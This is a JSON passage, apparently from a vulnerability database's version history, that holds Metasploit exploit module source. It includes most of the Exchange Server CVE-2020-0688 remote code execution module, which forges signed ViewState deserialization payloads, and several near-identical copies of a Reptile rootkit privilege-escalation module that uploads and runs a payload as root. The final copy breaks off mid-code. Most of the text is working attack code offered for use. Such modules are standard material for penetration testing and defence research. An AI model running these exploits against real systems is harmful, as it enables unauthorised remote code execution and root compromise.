'2020-0688'],\n ['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'],\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],\n [ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],\n [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ]\n ],\n 'DefaultOptions' =>\n {\n 'SSL' => true\n },\n 'DefaultTarget' => 1,\n 'DisclosureDate' => '2020-02-11',\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE, ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n },\n 'Privileged' => true\n ))\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\n ])\n\n register_advanced_options([\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),\n ])\n end\n\n def check\n state = get_request_setup\n viewstate = state[:viewstate]\n return CheckCode::Unknown if viewstate.nil?\n\n viewstate = Rex::Text.decode_base64(viewstate)\n body = viewstate[0...-20]\n signature = viewstate[-20..-1]\n\n unless generate_viewstate_signature(state[:viewstate_generator], state[:session_id], body) == signature\n return CheckCode::Safe\n end\n\n # we've validated the signature matches based on the data we have and thus\n # proven that we are capable of signing a viewstate ourselves\n CheckCode::Vulnerable\n end\n\n def generate_viewstate(generator, session_id, cmd)\n viewstate = ::Msf::Util::DotNetDeserialization.generate(cmd)\n signature = generate_viewstate_signature(generator, session_id, viewstate)\n Rex::Text.encode_base64(viewstate + signature)\n end\n\n def generate_viewstate_signature(generator, session_id, viewstate)\n mac_key_bytes = Rex::Text.hex_to_raw(generator).unpack('I<').pack('I>')\n mac_key_bytes << Rex::Text.to_unicode(session_id)\n OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), VALIDATION_KEY, viewstate + mac_key_bytes)\n end\n\n def exploit\n state = get_request_setup\n\n # the major limit is the max length of a GET request, the command will be\n # XML escaped and then base64 encoded which both increase the size\n if target.arch.first == ARCH_CMD\n execute_command(payload.encoded, opts={state: state})\n else\n cmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first\n execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state})\n end\n end\n\n def execute_command(cmd, opts)\n state = opts[:state]\n viewstate = generate_viewstate(state[:viewstate_generator], state[:session_id], cmd)\n 5.times do |iteration|\n # this request *must* be a GET request, can't use POST to use a larger viewstate\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\n 'cookie' => state[:cookies].join(''),\n 'agent' => state[:user_agent],\n 'vars_get' => {\n '__VIEWSTATE' => viewstate,\n '__VIEWSTATEGENERATOR' => state[:viewstate_generator]\n }\n })\n break\n rescue Rex::ConnectionError, Errno::ECONNRESET => e\n vprint_warning('Encountered a connection error while sending the command, sleeping before retrying')\n sleep iteration\n end\n end\n\n def get_request_setup\n # need to use a newer default user-agent than what Metasploit currently provides\n # see: https://docs.microsoft.com/en-us/microsoft-edge/web-platform/user-agent-string\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43'\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'owa', 'auth.owa'),\n 'method' => 'POST',\n 'agent' => user_agent,\n 'vars_post' => {\n 'password' => datastore['PASSWORD'],\n 'flags' => '4',\n 'destination' => full_uri(normalize_uri(target_uri.path, 'owa'), vhost_uri: true),\n 'username' => datastore['USERNAME']\n }\n })\n fail_with(Failure::Unreachable, 'The initial HTTP request to the server failed') if res.nil?\n cookies = [res.get_cookies]\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\n 'cookie' => res.get_cookies,\n 'agent' => user_agent\n })\n fail_with(Failure::UnexpectedReply, 'Failed to get the __VIEWSTATEGENERATOR page') unless res && res.code == 200\n cookies << res.get_cookies\n\n viewstate_generator = res.body.scan(/id=\"__VIEWSTATEGENERATOR\"\\s+value=\"([a-fA-F0-9]{8})\"/).flatten[0]\n if viewstate_generator.nil?\n print_warning(\"Failed to find the __VIEWSTATEGENERATOR, using the default value: #{DEFAULT_VIEWSTATE_GENERATOR}\")\n viewstate_generator = DEFAULT_VIEWSTATE_GENERATOR\n else\n vprint_status(\"Recovered the __VIEWSTATEGENERATOR: #{viewstate_generator}\")\n end\n\n viewstate = res.body.scan(/id=\"__VIEWSTATE\"\\s+value=\"([a-zA-Z0-9\\+\\/]+={0,2})\"/).flatten[0]\n if viewstate.nil?\n vprint_warning('Failed to find the __VIEWSTATE value')\n end\n\n session_id = res.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0]\n if session_id.nil?\n fail_with(Failure::UnexpectedReply, 'Failed to get the ASP.NET_SessionId from the response cookies')\n end\n vprint_status(\"Recovered the ASP.NET_SessionID: #{session_id}\")\n\n {user_agent: user_agent, cookies: cookies, viewstate: viewstate, viewstate_generator: viewstate_generator, session_id: session_id}\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-24T18:00:07", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 76}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-03-24T19:46:22", "history": [], "viewCount": 42, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:5B34B9C962E93AFAD432CA452F1AA316"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:6750EB26CF95AF303F20B1F55F16BFC3"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:8D9AEF98FF350F5148E683B412D36E88", "QUALYSBLOG:BFC12AE586238F25CEBFB766BB346DD9"]}, {"type": "redhat", "idList": ["RHSA-2020:0962"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:5E43B401DF4F8F79DF28BD1D503E49C1"]}, {"type": "schneier", "idList": ["SCHNEIER:7BA3A21164961546B6B1457226F95EDB"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201314", "OPENVAS:1361412562311220201324", "OPENVAS:1361412562311220201306", "OPENVAS:1361412562311220201312", "OPENVAS:1361412562311220201317", "OPENVAS:1361412562311220201303", "OPENVAS:1361412562311220201305", "OPENVAS:1361412562311220201304", "OPENVAS:1361412562311220201311"]}, {"type": "zdt", "idList": ["1337DAY-ID-34138"]}, {"type": "exploitdb", "idList": ["EDB-ID:48247"]}, {"type": "talos", "idList": ["TALOS-2019-0914"]}], "modified": "2020-03-24T19:46:22"}, "score": {"value": 1.7, "vector": "NONE", "modified": "2020-03-24T19:46:22"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-24T19:46:22", "differentElements": ["modified", "published"], "edition": 77}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-03-27T08:03:16", "history": [], "viewCount": 42, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "f5", "idList": ["F5:K70275209", "F5:K22113131", "F5:K03310902"]}, {"type": "kitploit", "idList": ["KITPLOIT:2245295184314950617", "KITPLOIT:4608743747623349401"]}, {"type": "exploitdb", "idList": ["EDB-ID:48257", "EDB-ID:48259"]}, {"type": "redhat", "idList": ["RHSA-2020:0983"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:0C01AD7DF1850D0059FF0CAF629FC366", "CARBONBLACK:B7F44D16E6A3B41B8ADEEF0C1512E8E6"]}, {"type": "threatpost", "idList": ["THREATPOST:DCE54029E2039178B6F2685D0BF8C518"]}, {"type": "securelist", "idList": ["SECURELIST:72336AB29FDACC045FA0A6720E7EBFEE"]}, {"type": "cve", "idList": ["CVE-2020-9065", "CVE-2020-7260"]}, {"type": "mskb", "idList": ["KB4535288"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D7E67A1FDBAEEBA3963692C91B11EDFC"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2020-0896.NASL", "OPENSUSE-2020-377.NASL", "SUSE_SU-2020-0792-1.NASL"]}], "modified": "2020-03-27T08:03:16"}, "score": {"value": 5.0, "vector": "NONE", "modified": "2020-03-27T08:03:16"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-27T08:03:16", "differentElements": ["modified", "published"], "edition": 78}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-03-27T18:19:43", "history": [], "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:778729113683CD1AC0A6B13B8CBAF857"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0388-1"]}, {"type": "thn", "idList": ["THN:38E80608368A67C138D1E4D8187D2AA3"]}, {"type": "f5", "idList": ["F5:K70275209", "F5:K22113131"]}, {"type": "kitploit", "idList": ["KITPLOIT:2245295184314950617", "KITPLOIT:4608743747623349401"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0984"]}, {"type": "exploitdb", "idList": ["EDB-ID:48257", "EDB-ID:48260", "EDB-ID:48259"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892160"]}, {"type": "redhat", "idList": ["RHSA-2020:0983"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:0C01AD7DF1850D0059FF0CAF629FC366", "CARBONBLACK:B7F44D16E6A3B41B8ADEEF0C1512E8E6"]}, {"type": "threatpost", "idList": ["THREATPOST:DCE54029E2039178B6F2685D0BF8C518"]}, {"type": "securelist", "idList": ["SECURELIST:72336AB29FDACC045FA0A6720E7EBFEE"]}, {"type": "cve", "idList": ["CVE-2020-9065", "CVE-2020-7260"]}], "modified": "2020-03-27T18:19:43"}, "score": {"value": 5.5, "vector": "NONE", "modified": "2020-03-27T18:19:43"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-27T18:19:43", "differentElements": ["sourceData"], "edition": 79}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-03-30T17:34:07", "history": [], "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:1EB984BAC30AFC074CF07FB50D9E9C8B"]}, {"type": "kitploit", "idList": ["KITPLOIT:3368977444199690371", "KITPLOIT:371508490786183282"]}, {"type": "f5", "idList": ["F5:K68024700", "F5:K68609614", "F5:K00384005"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0403-1", "OPENSUSE-SU-2020:0405-1", "OPENSUSE-SU-2020:0409-1", "OPENSUSE-SU-2020:0402-1", "OPENSUSE-SU-2020:0398-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:48262"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108734", "OPENVAS:1361412562310892162", "OPENVAS:1361412562310704647", "OPENVAS:1361412562310892161"]}, {"type": "zdt", "idList": ["1337DAY-ID-34166", "1337DAY-ID-34165"]}, {"type": "hackread", "idList": ["HACKREAD:6B188E79E15DF925B5C11D2A7223349C"]}], "modified": "2020-03-30T17:34:07"}, "score": {"value": 3.8, "vector": "NONE", "modified": "2020-03-30T17:34:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-03-30T17:34:07", "differentElements": ["sourceData"], "edition": 80}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-03-30T22:04:17", "history": [], "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:C63BDB5BFB4AECB9F2F95F69E238122B"]}, {"type": "kitploit", "idList": ["KITPLOIT:395217029864187486", "KITPLOIT:3368977444199690371"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-70840"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:1EB984BAC30AFC074CF07FB50D9E9C8B"]}, {"type": "f5", "idList": ["F5:K68024700", "F5:K68609614", "F5:K00384005"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0403-1", "OPENSUSE-SU-2020:0405-1", "OPENSUSE-SU-2020:0409-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:48262", "EDB-ID:48267"]}, {"type": "zdt", "idList": ["1337DAY-ID-34171", "1337DAY-ID-34169", "1337DAY-ID-34168"]}, {"type": "ubuntu", "idList": ["USN-4311-1", "USN-4313-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108734"]}], "modified": "2020-03-30T22:04:17"}, "score": {"value": 1.6, "vector": "NONE", "modified": "2020-03-30T22:04:17"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def 